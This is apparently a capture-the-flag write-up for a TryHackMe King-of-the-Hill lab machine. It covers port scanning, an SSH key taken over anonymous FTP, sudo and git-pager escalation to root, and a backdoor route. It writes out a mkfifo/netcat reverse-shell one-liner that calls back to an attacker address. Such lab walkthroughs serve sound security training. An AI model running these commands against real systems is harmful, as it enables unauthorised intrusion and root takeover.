TryHackMe KoTH Machine Production


KoTH Production


IP: 10.10.224.175


Let's search for open ports with Nmap (default scripts plus version detection, output saved to nmap/initial):

nmap -sC -sV -oN nmap/initial 10.10.224.175

Open ports:

21 (FTP)
22 (SSH)
139 (NetBIOS-SSN / SMB)
445 (SMB)
9001 (unknown service at this point; it turns out to be a backdoor, see below)
9002 (unknown service at this point; see below)


Nmap also shows that anonymous login is enabled for FTP, so let's log in and look around (:

We get an id_rsa (an SSH private key) belonging to some user. If we grab the matching public key as well and cat it out, the comment at the end of the key (by default user@host, set by ssh-keygen) tells us the id_rsa belongs to the user ashu.


Login as user ashu:

First restrict the key file to owner read/write only; ssh refuses to use a private key that is readable by other users:

chmod 600 id_rsa

Now let's log in:

ssh -i id_rsa ashu@10.10.224.175


Getting root via user ashu:

Let's check what ashu is allowed to run with sudo:

sudo -l

The output shows we can switch directly to user skidy with sudo:

sudo su skidy

YAY!

Now, before escalating further, have a look around skidy's home directory: there is a directory named homework containing a Python script, server1.py. Cat it and you will find the password needed to access the backdoor on port 9001 (used in the second root path below).

Let's check the sudo rights of user skidy the same way (sudo -l as skidy):

We see /usr/bin/git there, so let's check its GTFOBins page.

GTFOBins

Run:

sudo git -p help config

The -p flag forces git to send its output through a pager (less by default). Inside less, the ! command runs a shell command, and because the pager was spawned by a git process running as root, typing

!/bin/bash

at the less prompt gives us a root shell.

Getting root via ports 9001 and 9002:

nc 10.10.224.175 9001

This is a backdoor running as user ashu. It asks for a password: enter the one we found in server1.py in skidy's home directory and you get command execution as ashu.

On the port 9001 session, drop a reverse-shell script in /tmp (10.8.91.66 is the attacking machine's VPN address, 8888 the port we will listen on):

echo "#!/bin/bash\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.91.66 8888 >/tmp/f" > /tmp/a; chmod +x /tmp/a

Caveat: the \n in that echo is only turned into a real newline when the command is run by a shell whose echo expands backslash escapes (dash, the /bin/sh on Ubuntu, does; bash's builtin echo does not without -e). If the shebang line ends up fused with the rest of the script, the kernel cannot find the interpreter and the script will not run. printf '%s\n' '#!/bin/bash' '...' > /tmp/a behaves the same in every shell and is the safer choice.

Now start a netcat listener on your machine to catch the reverse shell on port 8888:

nc -lnvp 8888

Then connect to port 9002, which executes the command it is given with root privileges, and run the script:

nc 10.10.224.175 9002

/tmp/./a

(/tmp/./a is just an unusual way of writing /tmp/a.)

Yep, we got our shell as root (:


Thanks For Reading <3
